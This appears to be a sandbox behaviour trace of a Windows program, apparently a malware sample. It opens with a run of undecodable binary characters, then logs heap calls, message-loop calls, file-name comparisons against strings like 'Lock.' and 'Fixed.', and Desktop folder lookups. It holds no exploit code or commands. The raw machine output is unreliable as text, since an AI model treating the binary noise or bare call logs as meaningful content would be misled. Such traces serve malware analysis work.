ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0111.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75b28 | out: hHeap=0x2af0000) returned 1 [0111.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0111.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0111.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0111.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0111.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0111.790] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0111.790] TranslateMessage (lpMsg=0x8cf968) returned 0 [0111.790] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0111.790] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0111.790] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0111.790] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0111.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0111.790] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0111.790] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0111.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0111.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0111.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0111.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0111.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0111.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0111.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0111.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0111.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0111.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0111.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0111.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0111.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0111.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZvWDNly8ss.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0111.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vWDNly8ss.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0111.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WDNly8ss.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0111.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DNly8ss.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0111.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nly8ss.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0111.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ly8ss.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0111.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y8ss.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0111.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ss.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0111.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ss.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0111.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0111.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0111.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0111.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0111.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0111.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0111.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0111.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0111.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0111.791] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0111.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0111.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0111.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0111.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0111.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0111.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0111.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0111.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0111.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0111.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0111.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0111.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0111.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0111.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0111.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0111.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0111.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0111.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0111.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2a77eb8 [0111.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0111.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZvWDNly8ss.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0111.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vWDNly8ss.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0111.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WDNly8ss.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0111.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DNly8ss.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0111.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nly8ss.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0111.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ly8ss.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0111.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y8ss.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0111.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ss.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0111.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ss.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0111.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0111.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0111.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0111.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0111.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0111.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0111.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0111.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0111.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0111.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0111.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0111.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0111.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0111.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a30 | out: hHeap=0x2af0000) returned 1 [0111.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0111.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0111.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0111.793] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0111.793] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0111.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0111.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e88 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0111.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0111.793] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0111.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0111.794] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66b8 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a756f0 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66b8 | out: hHeap=0x2af0000) returned 1 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0111.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0111.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0111.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0111.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0111.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0111.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ea8 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0111.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0111.795] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0111.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0111.795] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa65d8 [0111.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0111.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0111.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0111.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa65d8 | out: hHeap=0x2af0000) returned 1 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71db8 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0111.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0111.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0111.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0111.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0111.797] 